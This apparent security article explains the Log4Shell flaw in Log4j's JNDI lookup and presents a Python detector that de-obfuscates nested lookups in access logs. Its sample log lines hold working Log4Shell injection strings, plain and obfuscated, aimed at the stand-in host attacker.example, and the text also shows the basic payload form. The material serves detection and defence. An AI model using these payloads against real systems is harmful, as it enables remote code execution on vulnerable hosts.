Preemptive Strategies to Stop Log4j and Its Variants

The Apache Log4j vulnerability, now known as Log4Shell, took security teams by surprise and the Internet by storm.

A seemingly innocuous logging library has been used by attackers to take control of vulnerable applications. Apache rated the vulnerability "critical" and published a patch in an attempt to contain the damage; Log4Shell also received the maximum CVSS score of 10.0. In other words, this is a critical flaw in a piece of code that sits at the foundation of a vast number of Web applications, and it is considered both extremely widespread and extremely dangerous.


The exploit relies on the benign reputation of logs. Logging is not usually thought of as an attack surface, which is why this attack caught so many security organizations off guard. Log4Shell lives in Log4j's lookup mechanism, specifically the JNDI lookup plug-in, which gives Java applications a way to retrieve objects stored in a directory service such as LDAP or DNS. Because Log4j evaluates lookup expressions found inside the text it is asked to log, the library can do something more proactive than "just" log, and therein lies the problem: an attacker who can get a crafted string into a log message can use the logging library as an entry point into the application.


The JNDI Lookup plug-in is where the Log4Shell vulnerability lies. Normally the input to the plug-in names only the object to be fetched. When a full URL is supplied instead, e.g. ${jndi:ldap://website.com/rce}, Log4j connects over JNDI to the server named in the URL and retrieves the referenced Java object. If that server is controlled by the attacker, the response can point at a class that the JVM then loads and executes, which yields remote code execution on the host that performed the logging.
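
The string-substitution behaviour described above is also what defeats the obvious defence, a grep for `${jndi:`: Log4j resolves nested lookups innermost-first, honours a `${var:-default}` fallback, and lowercases the lookup prefix, so `${${lower:j}ndi:...}` or `${${::-j}ndi:...}` reach the JNDI code path just as well as the plain form. The following detector, written for this article as an added example and not part of the original page or of Log4j itself, replays that resolution on log lines before checking for a JNDI lookup. It models only the handful of lookups that appear in evasive payloads (lower, upper, the quoted date pattern, and the :-default branch); the log lines, the documentation IP addresses and the host name attacker.example are constructed for the example.

```python
import re

# An innermost Log4j-style lookup: ${...} whose body holds no further '$', '{' or '}'.
# The jndi lookup itself is excluded (negative lookahead, case-insensitive, because
# Log4j lowercases lookup prefixes): it is the terminal form we want to surface,
# not evaluate.
INNER_LOOKUP = re.compile(r"\$\{(?!jndi:)([^${}]*)\}", re.IGNORECASE)

# A fully de-obfuscated JNDI lookup together with its URL scheme (ldap, ldaps, rmi, dns, ...).
JNDI_LOOKUP = re.compile(r"\$\{jndi:([a-z][a-z0-9+.-]*):[^}]*\}", re.IGNORECASE)


def _lookup(var: str):
    """Evaluate one lookup variable; None means 'unresolved', as in Log4j."""
    prefix, _, arg = var.partition(":")
    prefix = prefix.strip().lower()
    if prefix == "lower":
        return arg.lower()
    if prefix == "upper":
        return arg.upper()
    if prefix == "date":
        # ${date:'x'}: a quoted SimpleDateFormat pattern is emitted literally.
        m = re.fullmatch(r"'([^']*)'", arg.strip())
        return m.group(1) if m else None
    # env:, sys:, an empty prefix or an unknown one are treated as unresolved so
    # that the ":-default" branch is taken, which is exactly what evasive
    # payloads such as ${env:NOPE:-j} or ${::-j} count on.
    return None


def resolve_lookup(body: str) -> str:
    """Resolve one innermost lookup body, honouring Log4j's ${var:-default} syntax."""
    var, sep, default = body.partition(":-")
    value = _lookup(var)
    if value is not None:
        return value
    # Real Log4j leaves an unresolvable lookup without a default as literal text;
    # dropping it instead is conservative for detection (it can only add hits).
    return default if sep else ""


def normalize(text: str, max_rounds: int = 50) -> str:
    """Expand nested lookups innermost-first until only ${jndi:...} (if any) remains."""
    for _ in range(max_rounds):
        expanded = INNER_LOOKUP.sub(lambda m: resolve_lookup(m.group(1)), text)
        if expanded == text:
            break
        text = expanded
    return text


def is_log4shell_probe(line: str) -> bool:
    """True when the line, once de-obfuscated, carries a JNDI lookup."""
    return JNDI_LOOKUP.search(normalize(line)) is not None


def scan_log(lines):
    """Return (line_number, scheme, de-obfuscated lookup) for each suspicious line."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = JNDI_LOOKUP.search(normalize(line))
        if m:
            hits.append((n, m.group(1).lower(), m.group(0)))
    return hits


# Constructed access-log lines (documentation IP ranges, hypothetical host
# attacker.example); not real traffic.
SAMPLE_LOG_LINES = [
    '203.0.113.7 - - [10/Dec/2021:14:03:22 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:14:03:25 +0000] "GET /login HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/rce}"',
    '198.51.100.4 - - [10/Dec/2021:14:04:01 +0000] "GET /api HTTP/1.1" 404 0 "-" "${${lower:j}${upper:n}di:${lower:LDAP}://attacker.example/a}"',
    '198.51.100.4 - - [10/Dec/2021:14:04:09 +0000] "GET /api HTTP/1.1" 404 0 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://attacker.example/x}"',
    "192.0.2.9 - - [10/Dec/2021:14:05:30 +0000] \"GET /api HTTP/1.1\" 404 0 \"-\" \"${${env:NOPE:-j}ndi:${date:'l'}dap://attacker.example/y}\"",
    '192.0.2.9 - - [10/Dec/2021:14:06:00 +0000] "GET /search?q=${user} HTTP/1.1" 200 88 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for n, scheme, lookup in scan_log(SAMPLE_LOG_LINES):
        print(f"line {n}: {scheme} lookup -> {lookup}")
```

Run against the sample, lines 2 to 5 are reported with their lookups reduced to the plain `${jndi:<scheme>://...}` form, while the benign `${user}` template fragment on the last line is not flagged. The normalizer is deliberately conservative: anything it cannot resolve collapses to its default or to nothing, so it can over-report but will not be talked out of a hit by an unknown prefix. A production rule should still be paired with the real fix, upgrading Log4j or removing the JndiLookup class, because a detector can only see the inputs that happen to reach the logs it reads.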

The ubiquitous nature of this logging tool means that the exploit opportunities for hackers are endles ..
